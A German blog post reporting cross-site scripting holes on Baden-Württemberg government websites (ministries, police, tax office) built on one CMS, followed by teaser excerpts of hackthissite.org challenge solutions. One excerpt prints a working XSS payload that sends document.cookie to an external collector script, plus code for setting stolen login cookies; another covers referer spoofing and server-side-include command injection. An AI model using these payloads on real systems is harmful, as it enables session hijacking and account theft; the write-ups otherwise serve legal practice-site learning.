Direkt zum Hauptbereich

Fehlerseiten mit Folgen........


Also ich habe ja schon viel gesehn. Eigentlich, so dachte ich bisher.
Sollte dass Land die Datensicherheit und auch die Sicherheit ihrer Internetseiten
ernst nehmen. Wie ich gestern schon berichtet hatte, hat das Land Baden-Württemberg
einige XSS Probleme auf ihren Internetseiten. Hier mal Chief Wiggum als Minister ;-)


!! Hier die Fehlerseite !!
Aber eins nach dem anderem.

Durch dass Kommentar von Harry wurde ich auf die Problematik mit der
Fehlerseite aufmerksam gemacht. Dass dort noch die Muster Vorlage mit
Muster AG ausgegeben wird.

Das ist zwar nicht sehr Proffessionell aber naja. Also habe ich die Fehler url mal
im Kultusministerium ausprobiert. Und Ohje Ohje, das für XSS und wer weiß für
was noch alles Anfällige Pyrobase, selbstverständlich von der Telekom ;-)

Wird in vielen weiteren Ministerien eingesetzt und damit man es nicht so schwer
hat diese alles zusammenzufriemeln hilft das Land und gibt als Fehlerseite
eine Liste mit allen Pyrobase Ministerien aus.

Als kleines highlight kann man nun auch Inhalte von der Polizei verändern ;-)


Ich werde jetzt nicht jedes einzelne Ministerium anschreiben, da muss es doch auch eine
Zentrale Anlaufstelle geben ;-)


Für weitere Hinweise bin ich dankbar *fg*
So hier ein kleines Update.
Zum Besseren Verständniss habe ich hier eine kleine Liste mit ein Paar
XSS Betreffend das Land Baden-Württemberg zusammengefasst!.

















Die Polizei in Baden-Wüttemberg mal mit Musikalischer Unterstützung von den Fantastischen 4



Der Link Oben geht nicht??










Finnanzamt mal mit google
Der Link Oben geht nicht??










Mal eine Verwaltungsreform, aber warum fangt ihr denn nicht mit euren Internetseiten an??? Die könnte man sicherer machen. Und wenn es die Telekom macht, dann werd ich dort Berater ;-) *hüstel*
Der Link Oben geht nicht??








Die Feuerwehrschule hats auch!


Der Link Oben geht nicht??






Labels:

Kommentare

Kommentar veröffentlichen

Beliebte Posts aus diesem Blog

hackthissite.org Level 8 Basic Lösung

Hier ist ein eingabeformular in welches du deinen Namen schreiben sollst damit es eine Datei anlegen kann. Zum besseren Verständniss einfach mal testen, also "Mustermann" und auf submit klicken. Nun erscheint der Text: Your file has been saved. Please click here view the file. Hier ist die URL der Datei, welche angelegt wurde: http://www.hackthissite.org/missions/basic/8/tmp/mnxdljrz.shtml Genau, es ist eine shtml Datei also ein Server Side Include (SSI) damit kann man Befehle auf dem Server ausführen lassen und das ergebniss wird dann dem client übergeben! Hier musst du aber das Verzeichniss auslesen damit wir informationen über den Inhalt bekommen. Geb nun einfach mal folgendes in das Feld für den Namen ein: Richtig, ls bei unix/linux "list directory" zeigt den Inhalt eines Verzeichnisses an. Das neu hinzugefügte hier ist "ls ../" ../ heißt ein Verzeichniss nach oben. Also nicht in http://www.hackthissite.org/missions/basic/...
Kommentar veröffentlichen
Mehr anzeigen

hackthissite.org Level 5 Basic Lösung

Level 5 ist fast gleich wie der Level 4 nur mit dem kleinen Unterschied dass das Skript auf dem Server nun auch schaut woher die Anfrage kommt. Es überprüft also die Referer Url. Damit wir dies umgehen können wird das Skript aus 4 nur Modifiziert. Der HTTP Anfrage wird folgende Zeile hinzugefügt: Referer:http://www.hackthissite.org/missions/basic/5/index.php\r\n So und schon ist auch dass Problem behoben! Das Skript level5.php gibts auch zum Download.
Kommentar veröffentlichen
Mehr anzeigen

HTS realistic 9, the Codes for the Challenge!

Here are the javascript codes for HTS Level 9: 1. code, take a look at the cookie: javascript:alert(document.cookie); 2. The xss exploit insert into the message to mr. crap: </textarea> <script>window.location="http://getTheScript/getcookiemailer.php?keks="+document.cookie;</script> 3. The code to use the stolen cookie data: javascript:document.cookie="strUsername=m-crap%40crappysoft.com";document.cookie="strPassword=94a35a3b7befff5eb2a8415af04aa16c";document.cookie="intID=1"; Now you can move the money!! 4. Deleting the session data. Log out and go to the main page of crappy soft. Go to the mailing list form. Now you need an Firefox extension like UrlParams or an Proxy with freeze function. Or you manipulate the Post data with an faked http header. How to fake http header with PHP you can take a look at this page: http://hack1n9.blogspot.com/2008/06/hackthissiteorg-level-5-basic-lsung.html But it is written in german. The faste...
Kommentar veröffentlichen
Mehr anzeigen